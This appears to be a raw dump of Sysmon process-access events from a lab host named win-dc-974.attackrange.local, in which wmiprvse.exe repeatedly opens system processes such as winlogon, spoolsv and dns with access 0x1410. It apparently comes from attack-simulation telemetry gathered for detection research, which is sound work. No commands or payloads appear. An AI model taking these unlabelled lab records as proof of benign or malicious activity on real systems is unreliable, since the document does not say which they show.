22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 